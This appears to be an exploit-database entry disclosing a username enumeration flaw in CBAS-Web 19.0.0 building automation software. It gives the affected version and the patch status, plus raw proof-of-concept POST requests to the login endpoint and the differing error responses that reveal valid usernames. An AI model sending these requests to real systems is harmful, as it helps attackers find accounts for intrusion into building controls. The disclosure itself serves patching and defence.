header-logo
Suggest Exploit
vendor:
CBAS-Web
by:
LiquidWorm
5.3
CVSS
MEDIUM
Username Enumeration
203
CWE
Product Name: CBAS-Web
Affected Version From: 19.0.0
Affected Version To: 19.0.0
Patch Exists: Yes
Related CWE: CVE-2019-10848
CPE: a:computrols:cbas-web:19.0.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: NA
2019

CBAS-Web 19.0.0 – Username Enumeration

CBAS-Web 19.0.0 is vulnerable to username enumeration. An attacker can send a POST request to the /cbas/index.php?m=auth&a=login endpoint with a valid username and an empty password. If the username is valid, the response will contain an error message indicating that the username/password combination is invalid. If the username is invalid, the response will contain the username in an error message.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of CBAS-Web.
Source

Exploit-DB raw data:

# Exploit Title: CBAS-Web 19.0.0 - Username Enumeration
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 19.0.0
# Tested on: NA
# CVE : CVE-2019-10848
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system

# Testing for non-valid user:

POST /cbas/index.php?m=auth&a=login HTTP/1.1

username=randomuser&password=&challenge=60753c1b5e449de80e21472b5911594d&response=e16371917371b8b70529737813840c62

# Response for non-valid user:

<!-- Failed login comments appear here -->
<p class="alert-error">randomuser</p>

========================================================================

Testing for valid user:

POST /cbas/index.php?m=auth&a=login HTTP/1.1

username=admin&password=&challenge=6e4344e7ac62520dba82d7f20ccbd422&response=e09aab669572a8e4576206d5c14befc5s

# Response for valid user:

<!-- Failed login comments appear here -->
<p class="alert-error">Invalid username/password combination.  Please try again!</p>

Navigation

Suggest Exploit

Services By CQR